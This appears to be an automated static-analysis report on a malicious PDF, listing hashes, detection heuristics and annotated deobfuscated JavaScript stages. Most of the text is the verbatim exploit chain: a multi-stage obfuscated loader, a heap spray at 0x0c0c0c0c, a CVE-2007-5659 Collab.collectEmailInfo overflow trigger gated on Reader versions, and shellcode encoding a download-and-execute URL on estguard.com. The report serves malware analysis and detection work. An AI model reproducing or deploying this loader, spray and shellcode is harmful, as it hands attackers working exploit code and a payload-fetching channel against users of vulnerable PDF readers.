Malicious PDF — malware analysis report

Static analysis result for SHA-256 c6cda23530031c88…

MALICIOUS

PDF

8.2 KB First seen: 2026-05-08
MD5: 56d0fa6a0c46a705afa67a2c12777363 SHA-1: 64e32a9c4c426cc85181b6ccfb342ba00a401edb SHA-256: c6cda23530031c8829be9a85d9e1fe71747568dd6b22e2b6ee1a26f0446b2cbf
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell — caveat: none of the extracted artifacts below invokes PowerShell. The scripting actually observed in this sample is Adobe Acrobat JavaScript (stages decoded under "Extracted artifacts"), and the only post-exploitation behaviour visible is the shellcode's download of a second stage from the EMBEDDED_URL, which a static analysis does not retrieve; any PowerShell use would have to come from that stage and is not evidenced here.

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics (a /JavaScript action and a /JS stream, object 4). The JavaScript is a multi-stage loader. The first stage (javascript_obj0004_000.js) holds the next stage as a comma-separated list of decimal character codes and rebuilds it with String.fromCharCode. That second stage (numeric_charcode_stage_000.js) calls app.doc.syncAnnotScan() and app.doc.getAnnots() to read hex-encoded payload out of an annotation /Subject field and passes it to app.eval(), assembling the name 'eval' piecewise; the PDF_FOXIT_SYNCANNOTSCAN heuristic points to this annotation-staging step, not to the character-code decoding. The third stage (legacy_pdfkit_stage_000.js) decodes a second annotation /Subject with a key derived from its own source text and eval()s the result. The final stage (legacy_pdfkit_stage_001.js) heap-sprays 0x0c0c0c0c blocks and triggers Collab.collectEmailInfo (CVE-2007-5659), but only when the highest app.plugIns[].version satisfies (>= 8 && < 8.11) || < 7.1 — on patched or current Reader versions the document does nothing further. The shellcode embeds the http://estguard.com/cgi-bin/ca7/... URL listed under EMBEDDED_URL as little-endian %uXXXX escapes, so the primary intent is downloading and executing a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. The literal test in legacy_pdfkit_stage_001.js is `(v >= 8 && v < 8.11) || v < 7.1`, where v is the highest app.plugIns[].version found (a viewerVersion of 9.103 is forced to 9.13, which fails the gate). Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var n_hFua_p_v = new Array();var svVtTA_4te_A = 0;var Uy7f2HUMn_Pc_l = "";function hkO68C_t_g(J__4W7Wb, V_M815){var k6Xk_hPbO = V_M815.toString();var wCx_d__BIE3gx = "";for(var E8_j_vugrS7U = 0; E8_j_vugrS7U < k6Xk_hPbO.length; E8_j_vugrS7U++) {var xIC4bbn = parseInt(k6Xk_hPbO.substr(E8_j_vugrS7U, 1));if (!isNaN(xIC4bbn)) {xIC4bbn = xIC4bbn.toString(16);if (xIC4bbn.length == 1) { xIC4bbn = "0" + xIC4bbn; }else if (xIC4bbn.length != 2) { xIC4bbn = "00"; }wCx_d__BIE3gx = xIC4bbn + wCx_d__BIE3gx;}} …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://estguard.com/cgi-bin/ca7/z002106201r0019R8fea1881Xdd29ef5dY7eec06ccZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation (first-stage loader carved from PDF /JS object 4; code left unchanged).
// sourceCode is the NEXT stage (numeric_charcode_stage_000.js) stored as a comma-separated list
// of decimal character codes: 118,97,114,32 decodes to "var ", and with jump = 0 the leading
// codes read `var pr = null;` / `var fnc = 'ev';`, matching that artifact exactly.
// The call that feeds sourceCode through decrypt() and evaluates the result is not shown in
// this preview (the artifact is 1940 bytes; only the decoder and the data are visible here).
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
// Decodes a comma-separated string of decimal character codes into text.
//   str  - the encoded string (here: sourceCode).
//   jump - value subtracted from every code before conversion (an offset "key"; 0 for this sample).
// `list[i] - jump` coerces each decimal token to a number, so no explicit parseInt is needed.
// This String.fromCharCode rebuild is what the PDF_JS_EXPLOIT_CLUSTER heuristic matched on.
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation (second stage, decoded from the char-code string in javascript_obj0004_000.js;
// code left unchanged). This stage reads a hex-encoded payload out of an annotation's /Subject
// field and hands it to app.eval(). The callee name 'eval' is assembled piecewise
// ('ev' + 'a' + 'l') so the literal never appears in the script.
var pr = null;
var fnc = 'ev';
var sum = '';

// Makes Reader (re)scan the page's annotations so the getAnnots() call below sees them
// (PDF_FOXIT_SYNCANNOTSCAN heuristic).
app.doc.syncAnnotScan();

// app.plugIns is the list of loaded Reader plug-ins; the carrier is only read when at least
// one plug-in is present — a crude "are we running inside Adobe Reader" check.
if (app.plugIns.length != 0) {
	var num = 1;

	// pr is left as a global; the next stage (legacy_pdfkit_stage_000.js) reads pr[0].subject from it.
	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	// This stage's payload is carried in the /Subject of the SECOND annotation (index 1) on page 0.
	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	// Payload format: '-'-separated hex bytes. Element 0 (everything before the first '-') is skipped.
	var arr = sum.split(/-/);
	// 22 + 15 = 37 = '%'. Assigned but never used in the visible script (likely leftover or decoy).
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		// "0x" + <hex digits> is coerced to a number by fromCharCode, so each token becomes one character.
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	// With more than 3 plug-ins this is app['eval'](buf). With exactly 2 or 3 plug-ins the 'a' is
	// never appended, fnc is 'evl', and app['evl'] is undefined — the call throws and nothing runs.
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1B95 | 1785 bytes
SHA-256: e74fa483d5532cffe741e58c12d1bb07cbe869b1bb5d6b0d2ff9f63e036e70af
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation (third stage, deobfuscated from a repeated-marker hex string at offset 0x1B95;
// minified code left unchanged). pPRt45d(key, hexPayload) is a self-keyed decoder that ends in eval:
//  * hexPayload is overwritten with pr[0].subject — the /Subject of the FIRST page-0 annotation,
//    using the `pr` array left behind by numeric_charcode_stage_000.js. Any failure is swallowed
//    by the surrounding try/catch.
//  * The script calls pPRt45d(0), so no key is supplied. The key is then derived from the
//    function's own source text (pPRt45d.toString()): the char codes of every character in the
//    range 48..57 ('0'-'9') are summed round-robin into four slots (reduced by 512 when a slot
//    exceeds 512, then by 256 when it exceeds 256). Because the key depends on the function's own
//    digits, any edit to this function changes the key and the payload no longer decodes —
//    an anti-tamper / anti-analysis measure.
//  * Decoding: the payload is consumed two characters at a time with parseInt(pair, 23) (the radix
//    comes from GFV8_Mnapg[5] = 11 + 12), and (position + 2) * key[position % 4] is subtracted from
//    each value modulo 256 before String.fromCharCode.
//  * The result is executed via this["eval"](...) — eval reached through a property lookup to
//    avoid the literal call. The decoded text is the next artifact, legacy_pdfkit_stage_001.js.
function pPRt45d(uOM__xp7NQexc, M5AI121oxHFl){var R7A1S__DgH = 4;var uCiQ25_dAbB2 = new Array();var GFV8_Mnapg = new Array(107,256,11,  512, 106, 11,  44,40, 33);GFV8_Mnapg[5] += 12;var NM__85vu71_Eg = "";try {var R_h_qb = 0;if (app) {M5AI121oxHFl = pr[R_h_qb].subject;}} catch(e) {}if (!uOM__xp7NQexc) { uCiQ25_dAbB2[0] = 0;uCiQ25_dAbB2[1] = uCiQ25_dAbB2[0];uCiQ25_dAbB2[2] = uCiQ25_dAbB2[1];uCiQ25_dAbB2[3] = uCiQ25_dAbB2[2];var X2vT_d = GFV8_Mnapg[6] + 3;var O_0mQ3_W7g_H3 = X2vT_d + 11;var uP27p_0 = pPRt45d;var w4WQX0A888__A75 = 0;uP27p_0 = uP27p_0.toString();for(var hrOI7S_3m82 = 0; hrOI7S_3m82 < uP27p_0.length; hrOI7S_3m82++) {var Gi7o_r7V = uP27p_0.charCodeAt(hrOI7S_3m82);if (Gi7o_r7V > X2vT_d && Gi7o_r7V < O_0mQ3_W7g_H3) {if (w4WQX0A888__A75 == 4) {w4WQX0A888__A75 = 0;}uCiQ25_dAbB2[w4WQX0A888__A75] += Gi7o_r7V;if (uCiQ25_dAbB2[w4WQX0A888__A75] > GFV8_Mnapg[3]) {uCiQ25_dAbB2[w4WQX0A888__A75] -= 512;}w4WQX0A888__A75++;}}}else  { uCiQ25_dAbB2 = uOM__xp7NQexc;}for (var R_h6L12l_hjBs = 0; R_h6L12l_hjBs < 4; R_h6L12l_hjBs++) {if (uCiQ25_dAbB2[R_h6L12l_hjBs] > GFV8_Mnapg[1]) {uCiQ25_dAbB2[R_h6L12l_hjBs] -= GFV8_Mnapg[1];}}var a_d77uc5 = 0;var XNh8WsjR22 = 0;var h27Y7LA_go;var b8U8Sv__0tYw1t = 0;while ( a_d77uc5 < M5AI121oxHFl.length ) {var P__K_Hq_CpP = "";P__K_Hq_CpP = M5AI121oxHFl.substr(a_d77uc5, 2);var lm1__l2imqTq_22 = parseInt(P__K_Hq_CpP, GFV8_Mnapg[5]); if (XNh8WsjR22 == 4) {XNh8WsjR22 = 0;}lm1__l2imqTq_22 -= (b8U8Sv__0tYw1t + 2) * uCiQ25_dAbB2[XNh8WsjR22];if (lm1__l2imqTq_22 < 0) {lm1__l2imqTq_22 -= Math.floor(lm1__l2imqTq_22 / GFV8_Mnapg[1]) * GFV8_Mnapg[1];}NM__85vu71_Eg += String.fromCharCode(lm1__l2imqTq_22);{a_d77uc5 += 2;b8U8Sv__0tYw1t++;XNh8WsjR22++;}}var tMbt7_i3PT = this;tMbt7_i3PT["eval"](NM__85vu71_Eg);return 0;}

	// Entry point: no key argument, so the self-derived-key path described above is taken.
	pPRt45d(0);
legacy_pdfkit_stage_001.js | deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x4C3 | 4876 bytes
SHA-256: f3c8307d12031dccadc644e449e5ac995fa6fdf4bc9ecb236513a3c8b8a9fcfe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation (final stage, decoded from the annotation /Subject by legacy_pdfkit_stage_000.js;
// minified code left unchanged, including the two line wraps introduced by extraction).
// This is the heap spray plus the CVE-2007-5659 trigger. Reading order:
//  * hkO68C_t_g(n, ver): builds a short tag "3" + hex(n) + "P" + <each decimal digit of ver as a
//    2-digit hex byte, reversed, zero-padded to 8> — called with n = 23 and the Reader version, so the
//    tag identifies the victim's version to whatever consumes the shellcode.
//  * kB6nG_e3(sc, tag): appends the tag's bytes to the %uXXXX shellcode string as little-endian 16-bit
//    escapes (byte i+1 then byte i) and terminates with %u0000.
//  * S_7w570dIuk(s, n): doubles s until 2 * s.length >= n, then truncates to n/2 chars — the spray filler.
//  * Q13GN6oc(n, fill, ver): the spray. Target address 0x0c0c0c0c. The main shellcode Y7142_Ig, with the
//    tag appended, is parked on app.m_p03auW3Nl4Q3A; about 48 blocks ((0x0c0c0c0c - 0x400000) / 0x400000)
//    of 0x0c filler each ending in the short stub g_0MH_7Jm are stored in the global array n_hFua_p_v
//    (≈4 MB of UTF-16 per block). How the stub reaches the parked shellcode is not analysed here.
//    The %u escapes from %u7468%u7074%u2f3a onward spell "http://estguard.com/cgi-bin/ca7/..." — the URL
//    listed under EMBEDDED_URL (PDF_JS_SHELLCODE_DOWNLOAD_URL).
//  * nB7t5p7i(): the trigger. Collab.collectEmailInfo({subj: "", msg: <18,000 chars of 0x0c0c>}) is the
//    CVE-2007-5659 overflow; the 0x0c0c0c0c-filled msg steers control into the sprayed region.
//  * Dj1_k1_p_X2(ver): version gate — spray and trigger run only when (ver >= 8 && ver < 8.11) || ver < 7.1
//    (Reader 7.0.x and 8.0–8.1.0, the APSB08-13 window); otherwise the timer is just cleared.
//  * Trailer: ver = highest app.plugIns[].version (a viewerVersion of 9.103 is raised to 9.13, which fails
//    the gate), and Dj1_k1_p_X2 is invoked indirectly via app.setTimeOut("app.xu75nbV5Kio_J2(…)", 50) —
//    the string-evaluating form of setTimeOut, another indirection around a literal call.
var n_hFua_p_v = new Array();var svVtTA_4te_A = 0;var Uy7f2HUMn_Pc_l = "";function hkO68C_t_g(J__4W7Wb, V_M815){var k6Xk_hPbO = V_M815.toString();var wCx_d__BIE3gx = "";for(var E8_j_vugrS7U = 0; E8_j_vugrS7U < k6Xk_hPbO.length; E8_j_vugrS7U++) {var xIC4bbn = parseInt(k6Xk_hPbO.substr(E8_j_vugrS7U, 1));if (!isNaN(xIC4bbn)) {xIC4bbn = xIC4bbn.toString(16);if (xIC4bbn.length == 1) { xIC4bbn = "0" + xIC4bbn; }else if (xIC4bbn.length != 2) { xIC4bbn = "00"; }wCx_d__BIE3gx = xIC4bbn + wCx_d__BIE3gx;}}while(wCx_d__BIE3gx.length < 8) { wCx_d__BIE3gx = "0" + wCx_d__BIE3gx; }var f_3_n_p6F___Amk = J__4W7Wb.toString(16);if (f_3_n_p6F___Amk.length == 1) { f_3_n_p6F___Amk = "0" + f_3_n_p6F___Amk; }else if (f_3_n_p6F___Amk.length != 2) { f_3_n_p6F___Amk = "00"; }wCx_d__BIE3gx = "3" + f_3_n_p6F___Amk + "P" + wCx_d__BIE3gx;return wCx_d__BIE3gx;}function kB6nG_e3(Y7142_Ig, G4_e_3){var W__doRal2 = new Array("");var X4s3_YnM14_WKw = Y7142_Ig;var D48_Bu;if ((D48_Bu = Y7142_Ig.lastIndexOf("%u00")) != -1) {if (D48_Bu + 6 == Y7142_Ig.length) {W__doRal2[0] = Y7142_Ig.substr(D48_Bu + 4, 2);X4s3_YnM14_WKw = Y7142_Ig.substring(0, D48_Bu);}}D48_Bu = 1;for (E8_j_vugrS7U = 0; E8_j_vugrS7U < G4_e_3.length; E8_j_vugrS7U++) {var N_HoQo8CB6Rs = G4_e_3.charCodeAt(E8_j_vugrS7U).toString(16);if (N_HoQo8CB6Rs.length == 1) { N_HoQo8CB6Rs = "0" + N_HoQo8CB6Rs; }W__doRal2[D48_Bu] = N_HoQo8CB6Rs;D48_Bu++;}E8_j_vugrS7U = W__doRal2[0].length ? 
0 : 1;W__doRal2[D48_Bu] = "00";W__doRal2[D48_Bu + 1] = "00";D48_Bu += 2;if ((W__doRal2.length - E8_j_vugrS7U) % 2) {W__doRal2[D48_Bu] = "00";}while(E8_j_vugrS7U < W__doRal2.length) {X4s3_YnM14_WKw += "%u" + W__doRal2[E8_j_vugrS7U + 1] + W__doRal2[E8_j_vugrS7U];E8_j_vugrS7U += 2;}X4s3_YnM14_WKw += "%u0000";return X4s3_YnM14_WKw;}function S_7w570dIuk(kLw7__E1Dov, Sb47Rm){while (kLw7__E1Dov.length*2<Sb47Rm) {kLw7__E1Dov += kLw7__E1Dov;}kLw7__E1Dov = kLw7__E1Dov.substring(0,Sb47Rm/2);return kLw7__E1Dov;}function Q13GN6oc(QrCaav51J_FjL, Nc_lTm8w, U8__I2V){var JB_6_qM5_SP6l = 0x0c0c0c0c;var kLw7__E1Dov = unescape(Nc_lTm8w);var G4_e_3 = hkO68C_t_g(QrCaav51J_FjL, U8__I2V);var g_0MH_7Jm = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var Y7142_Ig = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5770%u786c%u0054%u7468%u7074%u2f3a%u652f%u7473%u7567%u7261%u2e64%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6163%u2f37%u307a%u3230%u3031%u3236%u3130%u3072%u3130%u523
9%u6638%u6165%u3831%u3138%u6458%u3264%u6539%u3566%u5964%u6537%u6365%u3630%u6363%u305a%u3031%u6630%u3630%u0030";app.m_p03auW3Nl4Q3A = unescape(kB6nG_e3(Y7142_Ig, G4_e_3));var H4WKGAjM8S = 0x400000;var Q_M_SKGx7LO7k = g_0MH_7Jm.length * 2;var Sb47Rm = H4WKGAjM8S - (Q_M_SKGx7LO7k+0x38);kLw7__E1Dov = S_7w570dIuk(kLw7__E1Dov, Sb47Rm);var v2Nf___8g = (JB_6_qM5_SP6l - 0x400000)/H4WKGAjM8S;for (var M0_18qMy8 = 0; M0_18qMy8 < v2Nf___8g; M0_18qMy8++) {n_hFua_p_v[M0_18qMy8] = kLw7__E1Dov + g_0MH_7Jm;}}function nB7t5p7i(){var YTE__N = "";for (E8_j_vugrS7U = 0; E8_j_vugrS7U < 12; E8_j_vugrS7U++) {YTE__N += unescape("%u0c0c%u0c0c");}var pn5I_Dt = "";for (E8_j_vugrS7U = 0; E8_j_vugrS7U < 750; E8_j_vugrS7U++) {pn5I_Dt += YTE__N;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: pn5I_Dt});app.clearTimeOut(svVtTA_4te_A);}function Dj1_k1_p_X2(qP_aJu){var y_7De_4_vD1x = svVtTA_4te_A;if ((qP_aJu >= 8 && qP_aJu < 8.11) || qP_aJu < 7.1) {Q13GN6oc(23, "%u0c0c%u0c0c", qP_aJu);nB7t5p7i();}if (y_7De_4_vD1x) {app.clearTimeOut(y_7De_4_vD1x);}}var U8__I2V = 0;var r_CV_oK3d = app.plugIns;for (var wWWlCSMm1__gCP = 0; wWWlCSMm1__gCP < r_CV_oK3d.length; wWWlCSMm1__gCP++) {var m0_SYFM__H = r_CV_oK3d[wWWlCSMm1__gCP].version;if (m0_SYFM__H > U8__I2V) { U8__I2V = m0_SYFM__H; }}if (app.viewerVersion == 9.103 && U8__I2V < 9.13) {U8__I2V = 9.13;}app.xu75nbV5Kio_J2 = Dj1_k1_p_X2;svVtTA_4te_A = app.setTimeOut("app.xu75nbV5Kio_J2(" + U8__I2V.toString() + ")", 50);